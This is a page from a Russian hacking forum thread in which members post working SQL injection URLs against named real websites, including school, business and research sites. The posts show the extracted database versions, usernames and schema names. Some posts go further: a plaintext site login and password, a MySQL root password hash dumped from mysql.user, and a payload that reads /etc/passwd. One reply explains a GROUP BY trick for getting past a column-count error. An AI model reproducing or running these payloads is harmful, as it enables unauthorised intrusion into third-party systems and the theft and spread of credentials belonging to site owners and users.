HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5211  
Старый 29.03.2008, 09:47
Holokost
Новичок
Регистрация: 09.11.2007
Сообщений: 8
С нами: 9738585

Репутация: 15
По умолчанию

http://www.shkola.spb.ru/server_news/index.phtml?id=-736+union+select+1,2,3,4,5,6,7,8,9,10,version(),us er(),database(),14,15,16,17,18/*
 
Ответить с цитированием

  #5212  
Старый 29.03.2008, 11:37
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
С нами: 9633635

Репутация: 338
По умолчанию

Цитата:
Сообщение от Holokost  
http://www.shkola.spb.ru/server_news/index.phtml?id=-736+union+select+1,2,3,4,5,6,7,8,9,10,version(),us er(),database(),14,15,16,17,18/*
БОЯН
 
Ответить с цитированием

  #5213  
Старый 29.03.2008, 13:43
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
С нами: 10194175

Репутация: 524
По умолчанию

eipcprograms.com - Egyptian International Programming Center
Код:
http://www.eipcprograms.com/product.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13/*
5.0.24a-log:d60350056:u70382875@cgihost
 
Ответить с цитированием

  #5214  
Старый 29.03.2008, 14:15
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
С нами: 10194175

Репутация: 524
По умолчанию

10-ти летию The Asylum посвящается...
Код:
http://www.theasylum.cc/product.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
5.0.22:asylum_main1:gf65431@localhost

Таба account с полями user и pass

Пользователь один [ логин : пасс ] : paul : g0g0asylum
 
Ответить с цитированием

  #5215  
Старый 29.03.2008, 14:52
Shram-spb
Познающий
Регистрация: 06.06.2007
Сообщений: 83
С нами: 9963383

Репутация: 140
По умолчанию

Код:
http://www.moygolos.ru/article.php?a=author&id=-4'+union+select+1,2,3,4,concat_ws(char(58),email,pass)+from+user+where+id+limit+0,1/*
 
Ответить с цитированием

  #5216  
Старый 29.03.2008, 15:00
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами: 10242288

Репутация: 536
По умолчанию

http://www.ais.com.ua/
Цитата:
http://www.ais.com.ua/auto_listing.php?page_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,CONCAT_WS(0 x3a,USER(),VERSION(),DATABASE())/*
root@localhost:4.1.22:ais
 
Ответить с цитированием

  #5217  
Старый 29.03.2008, 23:23
Buffalon
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
С нами: 9545988

Репутация: 63
По умолчанию

Цитата:
Сообщение от А®ТеS  
http://www.ais.com.ua/

root@localhost:4.1.22:ais
Квырнул дальше:
http://www.ais.com.ua/auto_listing.php?page_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x2A,user,password)+FROM+mysql.user/*
root*183b2d0876ceb447
http://www.ais.com.ua/auto_listing.php?page_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x2A,user,password)+FROM+mysql.user+limit+1,2/*

Последний раз редактировалось Buffalon; 30.03.2008 в 00:05..
 
Ответить с цитированием

  #5218  
Старый 30.03.2008, 00:01
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Цитата:
Сообщение от Constantine  
http://www.laptopshowcase.co.uk/downloads.php?id=1
Подобирать столбцы необходимо с помошью group+by

Код:
Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause
В итоге правельным будет следующий запрос

_http://www.laptopshowcase.co.uk/downloads.php?id=-1+group+by+10+union+select+1,2,version(),4,5,6,7,8 ,9,0,11/*
И снова ты меня спас)))))
 
Ответить с цитированием

  #5219  
Старый 30.03.2008, 14:17
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами: 9626078

Репутация: 141
По умолчанию

Код:
http://research.calacademy.org/research/ichthyology/catalog/getname.asp?rank=species&id=1 or 1=@@version--
ver=Microsoft SQL Server 2000
db=CoFWeb
user=IUSR_MATANGO
 
Ответить с цитированием

  #5220  
Старый 30.03.2008, 14:23
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами: 10242288

Репутация: 536
По умолчанию

http://www.au-pair-box.com/
Цитата:
http://www.au-pair-box.com/FORMfields/examples/gebot/fview_shorttimeemployment.php?__id=-1+UNION+SELECT+CONCAT_WS(0x3A,VERSION(),USER(),DAT ABASE()),LOAD_FILE('/etc/passwd'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19/*
Есть file_priv, magic_quotes_gpc=off
 
Ответить с цитированием
Ответ





Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.